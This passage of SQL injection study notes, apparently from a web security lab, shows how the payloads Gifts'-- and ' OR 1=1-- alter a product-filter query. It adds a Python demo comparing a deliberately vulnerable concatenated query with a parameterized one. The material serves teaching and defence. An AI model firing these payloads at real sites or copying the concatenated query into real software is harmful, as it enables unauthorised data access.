…where you can modify a SQL query to return additional results.
-- is a comment indicator in SQL. The rest of the query after it is interpreted as a comment, effectively removing it.
e.g. a shopping application with different product categories. When the user filters by Gifts, the URL would be:
https://insecure-website.com/products?category=Gifts
and the SQL query for that would be:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
Add the comment indicator and the URL becomes:
https://insecure-website.com/products?category=Gifts'--
which will be interpreted in SQL as:
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
so the AND released = 1 condition is commented out and no longer applied.
A similar attack, '+OR+1=1--, displays all products in any category, including categories that they don't know about:
https://insecure-website.com/products?category=Gifts'+OR+1=1--
and the query would be:
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
Since 1=1 is always true, the WHERE clause matches every row.

Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
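
The two inputs from the notes above, run against a string-built query and a parameterized one, as an added example that is not part of the original notes. It uses an in-memory SQLite database; the rows, the function names and the assumption that the application concatenates the category into the query text are constructed for illustration.

```python
import sqlite3

# Constructed sample rows: (name, category, released)
ROWS = [
    ("Gift card", "Gifts", 1),
    ("Wrapping paper", "Gifts", 1),
    ("Unreleased hamper", "Gifts", 0),
    ("Desk lamp", "Lighting", 1),
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)", ROWS)
    return db

def vulnerable_lookup(db, category):
    # Assumption: the application pastes the URL value into the SQL text.
    # A quote in the input closes the string literal, and -- comments out
    # everything that follows, including AND released = 1.
    sql = "SELECT name FROM products WHERE category = '" + category + "' AND released = 1"
    return [row[0] for row in db.execute(sql)]

def safe_lookup(db, category):
    # Hardened form: the value is bound as a parameter, so quotes and --
    # are compared as literal characters of the category name.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in db.execute(sql, (category,))]

def compare(category):
    # Returns (rows from the vulnerable query, rows from the parameterized query).
    db = make_db()
    return sorted(vulnerable_lookup(db, category)), sorted(safe_lookup(db, category))

if __name__ == "__main__":
    # The + signs in the URL decode to spaces before the value reaches the query.
    for value in ("Gifts", "Gifts'--", "Gifts' OR 1=1--"):
        print(repr(value), compare(value))
```

With the parameterized query, both modified inputs match no category and return no rows, while the legitimate value behaves the same in both versions.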